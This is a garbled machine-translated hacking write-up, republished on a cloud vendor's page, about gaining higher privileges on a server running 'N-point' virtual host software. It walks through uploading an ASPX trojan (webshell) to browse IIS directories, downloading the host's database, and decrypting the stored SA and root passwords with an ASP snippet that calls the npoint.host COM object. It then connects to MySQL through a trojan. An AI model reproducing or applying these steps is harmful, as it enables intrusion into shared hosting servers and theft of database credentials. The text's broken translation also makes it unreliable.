Home > Cloud Computing > Cloud Security

N-point virtual machine elevation

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

A friend lost a virtual machine and said he wanted to raise the privilege. The execution of 0DAY EXP on a third party cannot be mentioned. All have been patched ,. Okay. Not to mention nonsense. Next let's look for available things that the virtual machine supports

ASP ,. NET, PHP
Upload An ASPX Trojan to list IIS files

Found. The assigned permissions are not very dead. It can also span directories ,. Virtual Machine Management directory found

N point virtual machine. I flipped through the contents in the directory. He found his database. Download and view. Encrypted account and password,
SA and ROOT. Is encrypted. I thought about it. It seems that Baidu has an article saying that the decryption of the VM at was reversed. I went to Baidu for a moment and finally found it after wandering for a long time.
<! -- # Include file = "conn. asp" -->
<! -- # Include file = "siteinfo. asp" -->
<! -- # Include file = "char. asp" -->
<%
Set iishost = server. CreateObject ("npoint. host ")
X = iishost. Eduserpassword ("RNTYQ @ DLLDDNEKFLK @ EKHHMCGBFCDDFEBKFNDM @ MHKBIJIPDMJ @ B", 0)
Response. write x
%>
I think you can understand it, but you must put it in the program directory. But no write permission. You can only download one set of programs by yourself.
Then install and place the file in the INC directory. Inc/111.asp

Replace ciphertext first
<! -- # Include file = "conn. asp" -->
<! -- # Include file = "siteinfo. asp" -->
<! -- # Include file = "char. asp" -->
<%
Set iishost = server. CreateObject ("npoint. host ")
X = iishost. Eduserpassword ("LJDNI @ OFHMOCBFKEAAINJOADHMNEKIODCHMONHMI @ E", 0)
Response. write x
%>
Then, access the WEB directory of the ndian virtual machine on the local machine

Plaintext is successfully solved.


Now that the plaintext is resolved, Let's connect and see if this civilization is MYSQL.


Put a trojan connection,

If the connection is successful, I will not talk about the method of elevation of permission. It is estimated that we will continue smoothly and solve SA. It is also convenient to raise the right.
Here is a MYSQL permission escalation method.
This article is from: www. hake. cc/

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
pi hole virtual machine java virtual machine mac container vs virtual machine docker vs virtual machine virtual machine shared folder linux virtual machine mac virtual machine example
Related Article
How does personal cloud security guarantee data security?
Model-driven cloud security-automating cloud security with cl...
Cloud security to achieve effective prevention of the future ...
Focus on three major cloud security areas, you know?
Decrypting Cisco type 5 password hashes
Using redis to write webshell

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More